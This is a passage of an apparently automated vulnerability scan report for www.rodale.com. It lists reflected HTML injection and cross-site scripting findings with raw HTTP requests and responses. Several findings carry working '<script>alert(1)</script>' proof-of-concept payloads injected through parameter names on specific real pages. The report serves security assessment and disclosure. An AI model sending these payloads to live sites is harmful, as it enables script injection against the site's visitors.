<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page environmentad203"><a>7fcd599f757 node node-958">
...[SNIP]...

2.157. http://www.rodale.com/environment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /environment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4c02"><a>ad1ebde7751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /environment?c4c02"><a>ad1ebde7751=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:19 GMT
Date: Thu, 10 Mar 2011 17:05:19 GMT
Content-Length: 27236
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/environment?c4c02"><a>ad1ebde7751=1" title="Register" class="moreLink">
...[SNIP]...

2.158. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /files/rodalenews_favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29aae"><a>02f5b34ff2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /files29aae"><a>02f5b34ff2e/rodalenews_favicon.ico HTTP/1.1
Host: www.rodale.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; _chartbeat2=rkdyf9xiaaxcx0fo

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:44:06 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:14:07 GMT
Date: Thu, 10 Mar 2011 16:44:07 GMT
Content-Length: 22529
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page files29aae"><a>02f5b34ff2e files29aae">
...[SNIP]...

2.159. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /files/rodalenews_favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3565"><a>a2980b616ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /files/rodalenews_favicon.icof3565"><a>a2980b616ce HTTP/1.1
Host: www.rodale.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; _chartbeat2=rkdyf9xiaaxcx0fo

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:44:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43199
Expires: Fri, 11 Mar 2011 04:44:19 GMT
Date: Thu, 10 Mar 2011 16:44:20 GMT
Content-Length: 22508
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page files files-rodalenews_favicon.icof3565"><a>a2980b616ce node node-958">
...[SNIP]...

2.160. http://www.rodale.com/fitness [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /fitness

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcee9"><a>0759054b306 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fitnessfcee9"><a>0759054b306 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:58 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:00 GMT
Date: Thu, 10 Mar 2011 17:07:00 GMT
Content-Length: 22437
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page fitnessfcee9"><a>0759054b306 node node-958">
...[SNIP]...

2.161. http://www.rodale.com/fitness [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /fitness

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab5d7"><a>273e0a4586b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fitness?ab5d7"><a>273e0a4586b=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:16 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:22 GMT
Date: Thu, 10 Mar 2011 17:05:22 GMT
Content-Length: 26921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/fitness?ab5d7"><a>273e0a4586b=1" title="Register" class="moreLink">
...[SNIP]...

2.162. http://www.rodale.com/food [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83979"><a>a924d7e6ed3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /food83979"><a>a924d7e6ed3 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:31 GMT
Date: Thu, 10 Mar 2011 17:06:31 GMT
Content-Length: 22428
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page food83979"><a>a924d7e6ed3 node node-958">
...[SNIP]...

2.163. http://www.rodale.com/food [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913f0"><a>a344906f9cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /food?913f0"><a>a344906f9cb=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:10 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:12 GMT
Date: Thu, 10 Mar 2011 17:05:12 GMT
Content-Length: 27356
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/food?913f0"><a>a344906f9cb=1" title="Register" class="moreLink">
...[SNIP]...

2.164. http://www.rodale.com/green-kitchen-safety-tips [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /green-kitchen-safety-tips

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d20"><a>290e132ce9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /green-kitchen-safety-tips72d20"><a>290e132ce9d HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:08 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:10 GMT
Date: Thu, 10 Mar 2011 17:06:10 GMT
Content-Length: 22491
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page green-kitchen-safety-tips72d20"><a>290e132ce9d node node-958">
...[SNIP]...

2.165. http://www.rodale.com/green-kitchen-safety-tips [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /green-kitchen-safety-tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d12a"><script>alert(1)</script>9adf26f5469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /green-kitchen-safety-tips?3d12a"><script>alert(1)</script>9adf26f5469=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:06 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:08 GMT
Date: Thu, 10 Mar 2011 17:06:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2nbqvorb965q6draus57kofrs2; path=/; domain=.rodale.com
Content-Length: 44136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/green-kitchen-safety-tips?3d12a"><script>alert(1)</script>9adf26f5469=1&title=How+to+Keep+Your+Kitchen+Green%2C+Clean%2C+and+Safe">
...[SNIP]...

2.166. http://www.rodale.com/green-school-supplies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /green-school-supplies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36946"><a>1385a38e9b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /green-school-supplies36946"><a>1385a38e9b4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:29 GMT
Date: Thu, 10 Mar 2011 17:05:29 GMT
Content-Length: 22479
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page green-school-supplies36946"><a>1385a38e9b4 node node-958">
...[SNIP]...

2.167. http://www.rodale.com/green-school-supplies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /green-school-supplies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122cc"><script>alert(1)</script>3d802d1745c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /green-school-supplies?122cc"><script>alert(1)</script>3d802d1745c=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:26 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:27 GMT
Date: Thu, 10 Mar 2011 17:05:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2v292tmg9395t6lck999gj8qm6; path=/; domain=.rodale.com
Content-Length: 42547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/green-school-supplies?122cc"><script>alert(1)</script>3d802d1745c=1&title=Your+A%2B+Guide+to+Green+School+Supplies">
...[SNIP]...

2.168. http://www.rodale.com/happiest-place-live-united-states [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /happiest-place-live-united-states

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26131"><a>705617324d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /happiest-place-live-united-states26131"><a>705617324d0 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:43 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:44 GMT
Date: Thu, 10 Mar 2011 17:05:44 GMT
Content-Length: 22515
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page happiest-place-live-united-states26131"><a>705617324d0 node node-958">
...[SNIP]...

2.169. http://www.rodale.com/happiest-place-live-united-states [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /happiest-place-live-united-states

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e255"><script>alert(1)</script>1d4ffd27f15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /happiest-place-live-united-states?9e255"><script>alert(1)</script>1d4ffd27f15=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:40 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:42 GMT
Date: Thu, 10 Mar 2011 17:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2c4rqsbjg1e0dfvp45qa98g741; path=/; domain=.rodale.com
Content-Length: 38814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/happiest-place-live-united-states?9e255"><script>alert(1)</script>1d4ffd27f15=1&title=Be+As+Happy+as+Hawaii%2C+Wherever+You+Live">
...[SNIP]...

2.170. http://www.rodale.com/health [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /health

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c540a"><a>ae53cd85c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /healthc540a"><a>ae53cd85c37 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:20 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:22 GMT
Date: Thu, 10 Mar 2011 17:07:22 GMT
Content-Length: 22434
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page healthc540a"><a>ae53cd85c37 node node-958">
...[SNIP]...

2.171. http://www.rodale.com/health [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /health

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab44a"><a>bec9423f369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health?ab44a"><a>bec9423f369=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:16 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:21 GMT
Date: Thu, 10 Mar 2011 17:05:21 GMT
Content-Length: 26949
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/health?ab44a"><a>bec9423f369=1" title="Register" class="moreLink">
...[SNIP]...

2.172. http://www.rodale.com/heart-attack-triggers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /heart-attack-triggers

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb38"><a>45e9873ee32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /heart-attack-triggerscdb38"><a>45e9873ee32 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:36:06 GMT
Date: Thu, 10 Mar 2011 17:06:07 GMT
Content-Length: 22479
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page heart-attack-triggerscdb38"><a>45e9873ee32 node node-958">
...[SNIP]...

2.173. http://www.rodale.com/heart-attack-triggers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /heart-attack-triggers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb25"><script>alert(1)</script>564e60a91c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /heart-attack-triggers?dbb25"><script>alert(1)</script>564e60a91c5=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:02 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:04 GMT
Date: Thu, 10 Mar 2011 17:06:04 GMT
Connection: close
Connection: Transfer-Encoding
